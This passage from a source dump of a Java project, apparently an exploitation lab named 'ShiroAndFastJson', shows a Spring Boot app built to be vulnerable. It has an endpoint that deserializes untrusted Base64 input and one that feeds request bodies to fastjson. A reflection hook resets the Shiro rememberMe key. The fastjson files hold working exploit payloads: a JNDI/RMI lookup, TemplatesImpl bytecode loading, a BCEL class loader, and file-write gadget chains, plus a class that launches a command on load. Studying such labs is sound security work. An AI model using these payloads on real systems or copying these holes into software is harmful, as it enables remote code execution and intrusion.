175 | :skipRcPost
176 | 
177 | @REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
178 | if "%MAVEN_BATCH_PAUSE%" == "on" pause
179 | 
180 | if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE%
181 | 
182 | exit /B %ERROR_CODE%
183 | 


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  3 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  4 |     <modelVersion>4.0.0</modelVersion>
  5 |     <parent>
  6 |         <groupId>org.springframework.boot</groupId>
  7 |         <artifactId>spring-boot-starter-parent</artifactId>
  8 |         <version>2.4.5</version>
  9 |         <relativePath/> <!-- lookup parent from repository -->
 10 |     </parent>
 11 |     <packaging>jar</packaging>
 12 |     <groupId>com.shiro.vuln</groupId>
 13 |     <artifactId>ShiroAndFastJson</artifactId>
 14 |     <version>0.0.1-SNAPSHOT</version>
 15 |     <name>ShiroAndFastJson</name>
 16 |     <description>Demo project for Spring Boot</description>
 17 |     <properties>
 18 |         <java.version>1.8</java.version>
 19 |     </properties>
 20 |     <dependencies>
 21 | 
 22 |         <dependency>
 23 |             <groupId>com.alibaba</groupId>
 24 |             <artifactId>fastjson</artifactId>
 25 |             <version>1.2.68</version>
 26 |         </dependency>
 27 | 
 28 |         <dependency>
 29 |             <groupId>org.springframework.boot</groupId>
 30 |             <artifactId>spring-boot-starter-web</artifactId>
 31 |         </dependency>
 32 | 
 33 |         <dependency>
 34 |             <groupId>org.springframework.boot</groupId>
 35 |             <artifactId>spring-boot-starter-test</artifactId>
 36 |             <scope>test</scope>
 37 |         </dependency>
 38 | 
 39 |         <dependency>
 40 |             <groupId>org.apache.shiro</groupId>
 41 |             <artifactId>shiro-core</artifactId>
 42 |             <version>1.2.4</version>
 43 |         </dependency>
 44 |         <dependency>
 45 |             <groupId>org.apache.shiro</groupId>
 46 |             <artifactId>shiro-web</artifactId>
 47 |             <version>1.6.0</version>
 48 |         </dependency>
 49 |         <dependency>
 50 |             <groupId>org.apache.shiro</groupId>
 51 |             <artifactId>shiro-spring</artifactId>
 52 |             <version>1.6.0</version>
 53 |         </dependency>
 54 | 
 55 |         <dependency>
 56 |             <groupId>commons-collections</groupId>
 57 |             <artifactId>commons-collections</artifactId>
 58 |             <version>3.2.1</version>
 59 |         </dependency>
 60 |         <dependency>
 61 |             <groupId>org.apache.commons</groupId>
 62 |             <artifactId>commons-collections4</artifactId>
 63 |             <version>4.0</version>
 64 |         </dependency>
 65 |         <dependency>
 66 |             <groupId>com.mchange</groupId>
 67 |             <artifactId>c3p0</artifactId>
 68 |             <version>0.9.5.2</version>
 69 |         </dependency>
 70 |         <dependency>
 71 |             <groupId>org.javassist</groupId>
 72 |             <artifactId>javassist</artifactId>
 73 |             <version>3.25.0-GA</version>
 74 |             <scope>test</scope>
 75 |         </dependency>
 76 | 
 77 | 
 78 | 
 79 |         <dependency>
 80 |             <groupId>org.apache.tomcat</groupId>
 81 |             <artifactId>tomcat-dbcp</artifactId>
 82 |             <version>7.0.47</version>
 83 |         </dependency>
 84 | 
 85 |         <!-- https://mvnrepository.com/artifact/commons-io/commons-io -->
 86 |         <dependency>
 87 |             <groupId>commons-io</groupId>
 88 |             <artifactId>commons-io</artifactId>
 89 |             <version>2.2</version>
 90 |         </dependency>
 91 | 
 92 |         <!-- https://mvnrepository.com/artifact/mysql/mysql-connector-java -->
 93 |         <dependency>
 94 |             <groupId>mysql</groupId>
 95 |             <artifactId>mysql-connector-java</artifactId>
 96 |             <version>8.0.19</version>
 97 |         </dependency>
 98 | 
 99 |         <!-- https://mvnrepository.com/artifact/org.aspectj/aspectjtools -->
100 |         <dependency>
101 |             <groupId>org.aspectj</groupId>
102 |             <artifactId>aspectjtools</artifactId>
103 |             <version>1.9.6</version>
104 |         </dependency>
105 | 
106 |         <!-- https://mvnrepository.com/artifact/com.mchange/mchange-commons-java -->
107 |         <dependency>
108 |             <groupId>com.mchange</groupId>
109 |             <artifactId>mchange-commons-java</artifactId>
110 |             <version>0.2.11</version>
111 |         </dependency>
112 | 
113 |         <!-- https://mvnrepository.com/artifact/com.zaxxer/HikariCP -->
114 |         <dependency>
115 |             <groupId>com.zaxxer</groupId>
116 |             <artifactId>HikariCP</artifactId>
117 |             <version>3.2.0</version>
118 |         </dependency>
119 | 
120 |         <!-- https://mvnrepository.com/artifact/io.lettuce/lettuce-core -->
121 |         <dependency>
122 |             <groupId>io.lettuce</groupId>
123 |             <artifactId>lettuce-core</artifactId>
124 |             <version>5.1.6.RELEASE</version>
125 |         </dependency>
126 |         <!-- https://mvnrepository.com/artifact/org.postgresql/postgresql -->
127 |         <dependency>
128 |             <groupId>org.postgresql</groupId>
129 |             <artifactId>postgresql</artifactId>
130 |             <version>42.3.1</version>
131 |         </dependency>
132 | 
133 |         <!-- https://mvnrepository.com/artifact/org.rhq/rhq-scripting-python -->
134 |         <dependency>
135 |             <groupId>org.rhq</groupId>
136 |             <artifactId>rhq-scripting-python</artifactId>
137 |             <version>4.13.0</version>
138 |         </dependency>
139 | 
140 |         <!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy -->
141 |         <dependency>
142 |             <groupId>org.codehaus.groovy</groupId>
143 |             <artifactId>groovy</artifactId>
144 |             <version>2.4.12</version>
145 |         </dependency>
146 |         <!-- https://mvnrepository.com/artifact/commons-codec/commons-codec -->
147 |         <dependency>
148 |             <groupId>commons-codec</groupId>
149 |             <artifactId>commons-codec</artifactId>
150 |             <version>1.6</version>
151 |         </dependency>
152 | 
153 |         <!-- https://mvnrepository.com/artifact/ognl/ognl -->
154 |         <dependency>
155 |             <groupId>ognl</groupId>
156 |             <artifactId>ognl</artifactId>
157 |             <version>3.2.21</version>
158 |         </dependency>
159 |         <!-- https://mvnrepository.com/artifact/xalan/xalan -->
160 |         <dependency>
161 |             <groupId>xalan</groupId>
162 |             <artifactId>xalan</artifactId>
163 |             <version>2.7.2</version>
164 |         </dependency>
165 | 
166 |         <!-- https://mvnrepository.com/artifact/org.dom4j/dom4j -->
167 |         <dependency>
168 |             <groupId>org.dom4j</groupId>
169 |             <artifactId>dom4j</artifactId>
170 |             <version>2.1.3</version>
171 |         </dependency>
172 | 
173 | 
174 | 
175 | 
176 | 
177 | 
178 | 
179 | 
180 | 
181 | 
182 | 
183 | 
184 | 
185 |     </dependencies>
186 | 
187 |     <build>
188 |         <resources>
189 |             <resource>
190 |                 <directory>src/main/java</directory>
191 |                 <includes>
192 |                     <include>**/*.*</include>
193 |                 </includes>
194 |             </resource>
195 |             <resource>
196 |                 <directory>src/main/resources</directory>
197 |                 <includes>
198 |                     <include>**/*.*</include>
199 |                 </includes>
200 |             </resource>
201 |         </resources>
202 |         <plugins>
203 |             <plugin>
204 |                 <groupId>org.springframework.boot</groupId>
205 |                 <artifactId>spring-boot-maven-plugin</artifactId>
206 |             </plugin>
207 |         </plugins>
208 |     </build>
209 | 
210 | </project>
211 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/ShiroAndFastJsonApplication.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln;
 2 | 
 3 | import org.springframework.boot.SpringApplication;
 4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
 5 | import org.springframework.boot.web.servlet.ServletComponentScan;
 6 | 
 7 | @SpringBootApplication
 8 | //@ServletComponentScan
 9 | public class ShiroAndFastJsonApplication {
10 | 
11 |     public static void main(String[] args) {
12 |         SpringApplication.run(ShiroAndFastJsonApplication.class, args);
13 |     }
14 | 
15 | }
16 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/controller/IndexController.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.controller;
  2 | 
  3 | 
  4 | import com.alibaba.fastjson.JSON;
  5 | import com.alibaba.fastjson.JSONObject;
  6 | 
  7 | 
  8 | import com.shiro.vuln.filter.MemBehinderFilter;
  9 | import org.apache.shiro.mgt.RememberMeManager;
 10 | import org.apache.shiro.web.mgt.CookieRememberMeManager;
 11 | import org.springframework.stereotype.Controller;
 12 | import org.springframework.web.bind.annotation.PostMapping;
 13 | import org.springframework.web.bind.annotation.RequestBody;
 14 | import org.springframework.web.bind.annotation.RequestMapping;
 15 | import org.springframework.web.bind.annotation.ResponseBody;
 16 | 
 17 | import java.nio.charset.StandardCharsets;
 18 | import java.util.Base64;
 19 | import java.util.Map;
 20 | 
 21 | @Controller
 22 | public class IndexController {
 23 | 
 24 | 
 25 |     @RequestMapping("/index")
 26 |     @ResponseBody
 27 |     public String index() {
 28 |         System.out.println("index收到请求-------");
 29 |         return "hello";
 30 |     }
 31 | 
 32 | 
 33 |     @RequestMapping("/getKey")
 34 |     @ResponseBody
 35 |     public String getKey() {
 36 |         byte[] key = new CookieRememberMeManager().getCipherKey();
 37 |         return new String(Base64.getEncoder().encode(key));
 38 |     }
 39 | 
 40 | 
 41 |     @RequestMapping("/setKey")
 42 |     @ResponseBody
 43 |     public String setKey() {
 44 | 
 45 |         try {
 46 |             byte[] key =Base64.getDecoder().decode("2AvVhdsgUs0FSA3SDFAdag==") ;
 47 | 
 48 |             org.apache.tomcat.util.threads.TaskThread thread = (org.apache.tomcat.util.threads.TaskThread) Thread.currentThread();
 49 |             java.lang.reflect.Field field = thread.getClass().getSuperclass().getDeclaredField("contextClassLoader");
 50 |             field.setAccessible(true);
 51 |             Object obj = field.get(thread);
 52 |             field = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("resources");
 53 |             field.setAccessible(true);
 54 |             obj = field.get(obj);
 55 |             field = obj.getClass().getDeclaredField("context");
 56 |             field.setAccessible(true);
 57 |             obj = field.get(obj);
 58 |             field = obj.getClass().getSuperclass().getDeclaredField("filterConfigs");
 59 |             field.setAccessible(true);
 60 |             obj = field.get(obj);
 61 |             java.util.HashMap objMap = (java.util.HashMap) obj;
 62 |             java.util.Iterator entries = objMap.entrySet().iterator();
 63 |             while (entries.hasNext()) {
 64 |                 java.util.Map.Entry entry = (Map.Entry) entries.next();
 65 |                 if (entry.getKey().equals("shiroFilter")) {
 66 |                     obj = entry.getValue();
 67 |                     field = obj.getClass().getDeclaredField("filter");
 68 |                     field.setAccessible(true);
 69 |                     obj = field.get(obj);
 70 |                     field = obj.getClass().getSuperclass().getDeclaredField("securityManager");
 71 |                     field.setAccessible(true);
 72 |                     obj = field.get(obj);
 73 |                     field = obj.getClass().getSuperclass().getDeclaredField("rememberMeManager");
 74 |                     field.setAccessible(true);
 75 |                     obj = field.get(obj);
 76 |                     java.lang.reflect.Method setEncryptionCipherKey = obj.getClass().getSuperclass().getDeclaredMethod("setEncryptionCipherKey", new Class[]{byte[].class});
 77 |                     setEncryptionCipherKey.invoke(obj,new Object[]{key});
 78 |                     java.lang.reflect.Method setDecryptionCipherKey = obj.getClass().getSuperclass().getDeclaredMethod("setDecryptionCipherKey", new Class[]{byte[].class});
 79 |                     setDecryptionCipherKey.invoke(obj,new Object[]{key});
 80 | 
 81 |                 }
 82 |             }
 83 |         } catch (Exception e) {
 84 |             e.printStackTrace();
 85 |             return "fail";
 86 |         }
 87 |         return "ok";
 88 |     }
 89 | 
 90 |     @RequestMapping("/init")
 91 |     @ResponseBody
 92 |     public String init() throws Exception {
 93 |         //new MemBehinder3(Thread.currentThread().getContextClassLoader());
 94 |         //new MemBehinderFilter(Thread.currentThread().getContextClassLoader())
 95 |         return "init";
 96 |     }
 97 | 
 98 |     @RequestMapping("hello")
 99 |     public String hello(){
100 |         return "hello";
101 |     }
102 | 
103 |     @PostMapping("/json")
104 |     @ResponseBody
105 |     public JSONObject parse(@RequestBody String data) {
106 |         JSONObject jsonObject = new JSONObject();
107 |         jsonObject.put("status", 0);
108 |         //ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
109 |         //com.sun.org.apache.bcel.internal.util.ClassLoader；
110 |         // com.sun.org.apache.bcel.internal.util.ClassPath
111 | 
112 |         // java.awt.Point
113 | 
114 |         JSON.parse(data);
115 |         //JSON.parseObject(data);
116 |         return jsonObject;
117 |     }
118 | }
119 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/controller/SerController.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.controller;
 2 | 
 3 | 
 4 | import org.springframework.stereotype.Controller;
 5 | import org.springframework.web.bind.annotation.RequestMapping;
 6 | import org.springframework.web.bind.annotation.ResponseBody;
 7 | 
 8 | import java.io.ByteArrayInputStream;
 9 | import java.io.IOException;
10 | import java.io.ObjectInputStream;
11 | import java.util.Base64;
12 | 
13 | @Controller
14 | public class SerController {
15 | 
16 |     @RequestMapping("/ser")
17 |     @ResponseBody
18 |     public String ser(String str) {
19 | 
20 |         if (str!=null){
21 |             try {
22 |                 ObjectInputStream obs = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(str)));
23 |                 Object o = obs.readObject();
24 |                 o.toString();
25 |             } catch (Exception e) {
26 |                 e.printStackTrace();
27 |                 return "error";
28 |             }
29 | 
30 |         }
31 | 
32 |         return "ok";
33 |     }
34 | }
35 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/controller/UserController.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.controller;
 2 | 
 3 | import org.apache.shiro.SecurityUtils;
 4 | import org.apache.shiro.authc.AuthenticationException;
 5 | import org.apache.shiro.authc.AuthenticationToken;
 6 | import org.apache.shiro.authc.UsernamePasswordToken;
 7 | import org.apache.shiro.subject.Subject;
 8 | import org.springframework.stereotype.Controller;
 9 | import org.springframework.web.bind.annotation.PostMapping;
10 | import org.springframework.web.bind.annotation.RequestMapping;
11 | import org.springframework.web.bind.annotation.RequestParam;
12 | import org.springframework.web.bind.annotation.ResponseBody;
13 | 
14 | @Controller
15 | public class UserController {
16 | 
17 | 
18 |     @PostMapping("/doLogin")
19 |     public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name="rememberme", defaultValue="") String rememberMe){
20 |         Subject subject = SecurityUtils.getSubject();
21 |         try {
22 |             subject.login((AuthenticationToken)new UsernamePasswordToken(username, password, rememberMe.equals("remember-me")));
23 |         }catch (AuthenticationException e) {
24 |             return "forward:/login";
25 |         }
26 |         return "forward:/";
27 |     }
28 | 
29 |     @ResponseBody
30 |     @RequestMapping(value={"/"})
31 |     public String helloPage() {
32 |         return "hello";
33 |     }
34 | 
35 |     @ResponseBody
36 |     @RequestMapping(value={"/unauth"})
37 |     public String errorPage() {
38 |         return "error";
39 |     }
40 | 
41 |     @ResponseBody
42 |     @RequestMapping(value={"/login"})
43 |     public String loginPage() {
44 |         return "please login pattern /doLogin";
45 |     }
46 | 
47 | 
48 | 
49 | }
50 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Calc.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import java.io.*;
 4 | 
 5 | public class  Calc {
 6 | 	static {
 7 | 		try {
 8 | 			main(null);
 9 | 		} catch (Exception e) {
10 | 			// TODO Auto-generated catch block
11 | 			e.printStackTrace();
12 | 		}
13 | 	}
14 |     public static void main(String[] args) throws Exception {
15 |     	Process process = Runtime.getRuntime().exec("cmd.exe /c "+"calc");
16 |     	InputStream in =  process.getInputStream();
17 |     	BufferedReader br = new BufferedReader(new InputStreamReader(in));
18 |     	String line;
19 |     	StringBuilder sb = new StringBuilder();
20 | 		while ((line = br.readLine()) != null) {
21 |     	sb.append(line).append("\n");
22 |     	}
23 |     	String str = sb.toString();
24 |     	System.out.println(str);
25 |     	throw new Exception(str);
26 | }
27 | 
28 | }
29 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson01_JNDI.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import com.alibaba.fastjson.JSON;
 3 | 
 4 | public class Fastjson01_JNDI {
 5 |     public static void main(String[] args) throws Exception {
 6 |         //<=1.2.24
 7 |         String payload = "{\r\n"
 8 |         		+ "    \"a\": {\r\n"
 9 |         		+ "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \r\n"
10 |         		+ "        \"dataSourceName\": \"rmi://127.0.0.1:1099/Object\", \r\n"
11 |         		+ "        \"autoCommit\": true\r\n"
12 |         		+ "    }\r\n"
13 |         		+ "}";
14 |         //<1.2.48
15 | //        payload = "{\r\n"
16 | //        		+ "    \"a\": {\r\n"
17 | //        		+ "        \"@type\": \"java.lang.Class\", \r\n"
18 | //        		+ "        \"val\": \"com.sun.rowset.JdbcRowSetImpl\"\r\n"
19 | //        		+ "    }, \r\n"
20 | //        		+ "    \"b\": {\r\n"
21 | //        		+ "        \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \r\n"
22 | //        		+ "        \"dataSourceName\": \"rmi://127.0.0.1:1099/Object\", \r\n"
23 | //        		+ "        \"autoCommit\": true\r\n"
24 | //        		+ "    }\r\n"
25 | //        		+ "}";
26 |         System.out.println(payload);
27 |         JSON.parse(payload);	
28 |     }
29 | }
30 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson02_TemplatesImpl.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import java.io.*;
 3 | import com.alibaba.fastjson.JSON;
 4 | import com.alibaba.fastjson.parser.Feature;
 5 | import java.util.Base64;
 6 | 
 7 | public class Fastjson02_TemplatesImpl {
 8 |     public static void main(String[] args) throws Exception {
 9 | 		InputStream resourceAsStream = Fastjson02_TemplatesImpl.class.getResourceAsStream("TemplatesImplcmd.class");
10 | 		byte[] bs = new byte[resourceAsStream.available()];
11 | 		resourceAsStream.read(bs);
12 |         String encodedBytes = Base64.getEncoder().encodeToString(bs);
13 |         //<=1.2.24
14 |      	String payload = "{\r\n"
15 |      			+ "    \"a\": {\r\n"
16 |      			+ "        \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \r\n"
17 |      			+ "        \"_bytecodes\": [\r\n"
18 |      			+ "            \""+encodedBytes+"\"\r\n"
19 |      			+ "        ], \r\n"
20 |      			+ "        \"_name\": \"aaa\", \r\n"
21 |      			+ "        \"_tfactory\": { }, \r\n"
22 |      			+ "        \"_outputProperties\": { }\r\n"
23 |      			+ "    }\r\n"
24 |      			+ "}";
25 |         //<1.2.48
26 | //     	payload = "{\r\n"
27 | //     			+ "    \"a\": {\r\n"
28 | //     			+ "        \"@type\": \"java.lang.Class\", \r\n"
29 | //     			+ "        \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"\r\n"
30 | //     			+ "    }, \r\n"
31 | //     			+ "    \"b\": {\r\n"
32 | //     			+ "        \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \r\n"
33 | //     			+ "        \"_bytecodes\": [\r\n"
34 | //     			+ "            \""+encodedBytes+"\"\r\n"
35 | //     			+ "        ], \r\n"
36 | //     			+ "        \"_name\": \"aaa\", \r\n"
37 | //     			+ "        \"_tfactory\": { }, \r\n"
38 | //     			+ "        \"_outputProperties\": { }\r\n"
39 | //     			+ "    }\r\n"
40 | //     			+ "}";
41 |      	System.out.println(payload);
42 |      	JSON.parseObject(payload, Feature.SupportNonPublicField);
43 |      	
44 |     }
45 | }
46 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson03_Becl.java:
--------------------------------------------------------------------------------
 1 | //package com.shiro.vuln.fastjson;
 2 | //import java.io.FileInputStream;
 3 | //import java.io.InputStream;
 4 | //
 5 | //import com.sun.org.apache.bcel.internal.classfile.Utility;
 6 | //import com.alibaba.fastjson.JSON;
 7 | //
 8 | //public class Fastjson03_Becl {
 9 | //	public static void main(String[] args) throws Exception {
10 | //        //<=1.2.24 and tomcat-dbcp 7
11 | //		InputStream resourceAsStream = Fastjson02_TemplatesImpl.class.getResourceAsStream("Calc.class");
12 | //		byte[] bs = new byte[resourceAsStream.available()];
13 | //		resourceAsStream.read(bs);
14 | //		String code = "$$BCEL$$"+Utility.encode(bs,true);
15 | //        String payload = "{\r\n"
16 | //        		+ "    {\r\n"
17 | //        		+ "    \"aaa\": {\r\n"
18 | //        		+ "            \"@type\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\", \r\n"
19 | //        		+ "            \"driverClassLoader\": {\r\n"
20 | //        		+ "                \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\r\n"
21 | //        		+ "            }, \r\n"
22 | //        		+ "            \"driverClassName\": \""+code+"\"\r\n"
23 | //        		+ "        }\r\n"
24 | //        		+ "    }:\"bbb\"\r\n"
25 | //        		+ "}";
26 | //        //<1.2.48
27 | ////		  payload = "{\r\n"
28 | ////		  		+ "    {\r\n"
29 | ////		  		+ "        \"a\": {\r\n"
30 | ////		  		+ "            \"@type\": \"java.lang.Class\",\r\n"
31 | ////		  		+ "            \"val\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\"\r\n"
32 | ////		  		+ "        },\r\n"
33 | ////		  		+ "        \"b\": {\r\n"
34 | ////		  		+ "            \"@type\": \"java.lang.Class\",\r\n"
35 | ////		  		+ "            \"val\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\r\n"
36 | ////		  		+ "        },\r\n"
37 | ////		  		+ "        \"c\": {\r\n"
38 | ////		  		+ "            \"@type\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\",\r\n"
39 | ////		  		+ "            \"driverClassLoader\": {\r\n"
40 | ////		  		+ "                \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\r\n"
41 | ////		  		+ "            },\r\n"
42 | ////		  		+ "            \"driverClassName\": \""+code+"\"\r\n"
43 | ////		  		+ "        }\r\n"
44 | ////		  		+ "    }:\"bbb\"\r\n"
45 | ////		  		+ "}";
46 | //        System.out.println(payload);
47 | //        JSON.parseObject(payload);
48 | //        //new ClassLoader().loadClass(code).newInstance();
49 | //    }
50 | //
51 | //}
52 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson04_JDK11.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | import java.io.ByteArrayOutputStream;
  3 | import java.io.IOException;
  4 | import java.util.Arrays;
  5 | import java.util.Base64;
  6 | import java.util.zip.Deflater;
  7 | import java.util.zip.Inflater;
  8 | 
  9 | import com.alibaba.fastjson.JSON;
 10 | 
 11 | public class Fastjson04_JDK11 {
 12 |     public static void main(String[] args) throws Exception {
 13 |     	String code = gzcompress("qwer");
 14 |     	//php -r "echo base64_encode(gzcompress('RMB122 is here'));"
 15 |     	//<=1.2.68 and JDK11
 16 |         String payload = "{\r\n"
 17 |         		+ "    \"@type\":\"java.lang.AutoCloseable\",\r\n"
 18 |         		+ "    \"@type\":\"sun.rmi.server.MarshalOutputStream\",\r\n"
 19 |         		+ "    \"out\":\r\n"
 20 |         		+ "    {\r\n"
 21 |         		+ "        \"@type\":\"java.util.zip.InflaterOutputStream\",\r\n"
 22 |         		+ "        \"out\":\r\n"
 23 |         		+ "        {\r\n"
 24 |         		+ "           \"@type\":\"java.io.FileOutputStream\",\r\n"
 25 |         		+ "           \"file\":\"1.txt\",\r\n"
 26 |         		+ "           \"append\":false\r\n"
 27 |         		+ "        },\r\n"
 28 |         		+ "        \"infl\":\r\n"
 29 |         		+ "        {\r\n"
 30 |         		+ "            \"input\":\r\n"
 31 |         		+ "            {\r\n"
 32 |         		+ "                \"array\":\""+code+"\",\r\n"
 33 |         		+ "                \"limit\":22\r\n"
 34 |         		+ "            }\r\n"
 35 |         		+ "        },\r\n"
 36 |         		+ "        \"bufLen\":1048576\r\n"
 37 |         		+ "    },\r\n"
 38 |         		+ "    \"protocolVersion\":1\r\n"
 39 |         		+ "}\r\n"
 40 |         		+ "";
 41 |         //JDK8/10
 42 | //        payload = "{\r\n"
 43 | //        		+ "    '@type':\"java.lang.AutoCloseable\",\r\n"
 44 | //        		+ "    '@type':'sun.rmi.server.MarshalOutputStream',\r\n"
 45 | //        		+ "    'out':\r\n"
 46 | //        		+ "    {\r\n"
 47 | //        		+ "        '@type':'java.util.zip.InflaterOutputStream',\r\n"
 48 | //        		+ "        'out':\r\n"
 49 | //        		+ "        {\r\n"
 50 | //        		+ "           '@type':'java.io.FileOutputStream',\r\n"
 51 | //        		+ "           'file':'1.txt',\r\n"
 52 | //        		+ "           'append':false\r\n"
 53 | //        		+ "        },\r\n"
 54 | //        		+ "        'infl':\r\n"
 55 | //        		+ "        {\r\n"
 56 | //        		+ "            'input':'"+code+"'\r\n"
 57 | //        		+ "        },\r\n"
 58 | //        		+ "        'bufLen':1048576\r\n"
 59 | //        		+ "    },\r\n"
 60 | //        		+ "    'protocolVersion':1\r\n"
 61 | //        		+ "}\r\n"
 62 | //        		+ "";
 63 |         
 64 |         System.out.println(payload);
 65 |         JSON.parse(payload);	
 66 |     }
 67 |     public static String gzcompress(String code) {
 68 |     	byte[] data = code.getBytes();
 69 |         byte[] output = new byte[0];
 70 |         Deflater compresser = new Deflater();
 71 |         compresser.reset();
 72 |         compresser.setInput(data);
 73 |         compresser.finish();
 74 |         ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
 75 |         try {
 76 |             byte[] buf = new byte[1024];
 77 |             while (!compresser.finished()) {
 78 |                 int i = compresser.deflate(buf);
 79 |                 bos.write(buf, 0, i);
 80 |             }
 81 |             output = bos.toByteArray();
 82 |         } catch (Exception e) {
 83 |             output = data;
 84 |             e.printStackTrace();
 85 |         } finally {
 86 |             try {
 87 |                 bos.close();
 88 |             } catch (IOException e) {
 89 |                 e.printStackTrace();
 90 |             }
 91 |         }
 92 |         compresser.end();
 93 |         System.out.println(Arrays.toString(output));
 94 |         return Base64.getEncoder().encodeToString(output);
 95 |     }
 96 |     public static String gzuncompress(String code) {
 97 |     	byte[] data = Base64.getDecoder().decode(code);
 98 |     	byte[] output = new byte[0];
 99 |         Inflater decompresser = new Inflater();
100 |         decompresser.reset();
101 |         decompresser.setInput(data);
102 |         ByteArrayOutputStream o = new ByteArrayOutputStream(data.length);
103 |         try {
104 |             byte[] buf = new byte[1024];
105 |             while (!decompresser.finished()) {
106 |                 int i = decompresser.inflate(buf);
107 |                 o.write(buf, 0, i);
108 |             }
109 |             output = o.toByteArray();
110 |         } catch (Exception e) {
111 |             e.printStackTrace();
112 |         } finally {
113 |             try {
114 |                 o.close();
115 |             } catch (IOException e) {
116 |                 e.printStackTrace();
117 |             }
118 |         }
119 |         decompresser.end();
120 |         return new String(output);
121 |     }
122 | }
123 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson05_io_write_1.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson05_io_write_1 {
 6 |     public static void main(String[] args) throws Exception {
 7 |     	//<=1.2.68 and commons-io-2.0-2.6
 8 |     	String code = "qaxnb";
 9 |         for (int i = 0; i < 8200; i++) {
10 | 			code += "a";
11 | 		}
12 |         String payload = "{\r\n"
13 |         		+ "  \"x\":{\r\n"
14 |         		+ "    \"@type\":\"com.alibaba.fastjson.JSONObject\",\r\n"
15 |         		+ "    \"input\":{\r\n"
16 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
17 |         		+ "      \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
18 |         		+ "      \"reader\":{\r\n"
19 |         		+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
20 |         		+ "        \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n"
21 |         		+ "      },\r\n"
22 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
23 |         		+ "      \"bufferSize\":1024\r\n"
24 |         		+ "    },\r\n"
25 |         		+ "    \"branch\":{\r\n"
26 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
27 |         		+ "      \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
28 |         		+ "      \"writer\":{\r\n"
29 |         		+ "        \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
30 |         		+ "        \"file\":\"1.txt\",\r\n"
31 |         		+ "        \"encoding\":\"UTF-8\",\r\n"
32 |         		+ "        \"append\": false\r\n"
33 |         		+ "      },\r\n"
34 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
35 |         		+ "      \"bufferSize\": 1024,\r\n"
36 |         		+ "      \"writeImmediately\": true\r\n"
37 |         		+ "    },\r\n"
38 |         		+ "    \"trigger\":{\r\n"
39 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
40 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
41 |         		+ "      \"is\":{\r\n"
42 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
43 |         		+ "        \"input\":{\r\n"
44 |         		+ "          \"$ref\":\"$.input\"\r\n"
45 |         		+ "        },\r\n"
46 |         		+ "        \"branch\":{\r\n"
47 |         		+ "          \"$ref\":\"$.branch\"\r\n"
48 |         		+ "        },\r\n"
49 |         		+ "        \"closeBranch\": true\r\n"
50 |         		+ "      },\r\n"
51 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
52 |         		+ "      \"lenient\":false,\r\n"
53 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
54 |         		+ "    },\r\n"
